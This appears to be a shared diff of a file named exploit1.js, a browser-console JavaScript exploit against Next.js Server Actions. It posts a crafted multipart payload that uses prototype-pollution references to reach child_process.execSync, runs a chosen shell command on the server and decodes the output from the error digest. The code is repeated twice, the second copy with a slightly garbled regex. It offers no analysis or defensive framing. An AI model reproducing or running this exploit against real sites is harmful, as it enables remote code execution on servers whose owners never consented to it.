razzul · December 16, 2025 09:12
diff --git a/exploit1.js b/exploit1.js
 (async () => {
    // === CONFIGURATION ===
    const cmd = "touch iWasHere"; // The command you want to run
    const targetUrl = "/namaste"; // The endpoint to hit (relative to current domain)
    
    console.log(`[*] Attempting to run command: ${cmd}`);

    // 1. Construct the malicious payload
    // This injects the command into a child_process.execSync call and throws the result in an error digest
    const payloadJson = `{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('${cmd}').toString('base64');throw Object.assign(new Error('x'),{digest: res});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}`;
    
    const boundary = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad";
    
    // 2. Build the multipart/form-data body manually
    const bodyParts = [
        `--${boundary}`,
        'Content-Disposition: form-data; name="0"',
        '',
        payloadJson,
        `--${boundary}`,
        'Content-Disposition: form-data; name="1"',
        '',
        '"$@0"',
        `--${boundary}`,
        'Content-Disposition: form-data; name="2"',
        '',
        '[]',
        `--${boundary}--`,
        ''
    ].join('\r\n');

    try {
        // 3. Send the request
        const res = await fetch(targetUrl, {
            method: 'POST',
            headers: {
                'Next-Action': 'x', // Required to trigger Server Action logic
                'X-Nextjs-Request-Id': '7a3f9c1e',
                'X-Nextjs-Html-Request-ld': '9bK2mPaRtVwXyZ3S@!sT7u',
                'Content-Type': `multipart/form-data; boundary=${boundary}`,
                'X-Nextjs-Html-Request-Id': 'SSTMXm7OJ_g0Ncx6jpQt9'
            },
            body: bodyParts
        });

        const responseText = await res.text();

        // 4. Extract and Decode the output
        // The server returns the output inside the "digest" field of the error
        const digestMatch = responseText.match(/"digest"\s*:\s*"((?:[^"\\]|\\.)*)"/);

        if (digestMatch && digestMatch[1]) {
            let rawBase64 = digestMatch[1];
            
            // Clean JSON escaping
            let cleanBase64 = JSON.parse(`"${rawBase64}"`);
            
            // Decode Base64 (handling UTF-8 correctly)
            const decodedStr = new TextDecoder().decode(
                Uint8Array.from(atob(cleanBase64), c => c.charCodeAt(0))
            );

            console.log("%c[+] Exploit Successful!", "color: green; font-weight: bold; font-size: 14px;");
            console.log("Command Output:\n----------------\n" + decodedStr + "\n----------------");
        } else {
            console.log("%c[-] Exploit Failed", "color: red; font-weight: bold;");
            console.log("Could not find 'digest' in response. Raw response preview:", responseText.substring(0, 200));
        }

    } catch (e) {
        console.error("Request Error:", e);
    }
 })();
	(async () => {
	// === CONFIGURATION ===
	const cmd = "touch iWasHere"; // The command you want to run
	const targetUrl = "/namaste"; // The endpoint to hit (relative to current domain)

	console.log(`[*] Attempting to run command: ${cmd}`);

	// 1. Construct the malicious payload
	// This injects the command into a child_process.execSync call and throws the result in an error digest
	const payloadJson = `{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('${cmd}').toString('base64');throw Object.assign(new Error('x'),{digest: res});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}`;

	const boundary = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad";

	// 2. Build the multipart/form-data body manually
	const bodyParts = [
	`--${boundary}`,
	'Content-Disposition: form-data; name="0"',
	'',
	payloadJson,
	`--${boundary}`,
	'Content-Disposition: form-data; name="1"',
	'',
	'"$@0"',
	`--${boundary}`,
	'Content-Disposition: form-data; name="2"',
	'',
	'[]',
	`--${boundary}--`,
	''
	].join('\r\n');

	try {
	// 3. Send the request
	const res = await fetch(targetUrl, {
	method: 'POST',
	headers: {
	'Next-Action': 'x', // Required to trigger Server Action logic
	'X-Nextjs-Request-Id': '7a3f9c1e',
	'X-Nextjs-Html-Request-ld': '9bK2mPaRtVwXyZ3S@!sT7u',
	'Content-Type': `multipart/form-data; boundary=${boundary}`,
	'X-Nextjs-Html-Request-Id': 'SSTMXm7OJ_g0Ncx6jpQt9'
	},
	body: bodyParts
	});

	const responseText = await res.text();

	// 4. Extract and Decode the output
	// The server returns the output inside the "digest" field of the error
	const digestMatch = responseText.match(/"digest"\s:\s"((?:[^"\\]\|\\.)*)"/);

	if (digestMatch && digestMatch[1]) {
	let rawBase64 = digestMatch[1];

	// Clean JSON escaping
	let cleanBase64 = JSON.parse(`"${rawBase64}"`);

	// Decode Base64 (handling UTF-8 correctly)
	const decodedStr = new TextDecoder().decode(
	Uint8Array.from(atob(cleanBase64), c => c.charCodeAt(0))
	);

	console.log("%c[+] Exploit Successful!", "color: green; font-weight: bold; font-size: 14px;");
	console.log("Command Output:\n----------------\n" + decodedStr + "\n----------------");
	} else {
	console.log("%c[-] Exploit Failed", "color: red; font-weight: bold;");
	console.log("Could not find 'digest' in response. Raw response preview:", responseText.substring(0, 200));
	}

	} catch (e) {
	console.error("Request Error:", e);
	}
	})();
No results found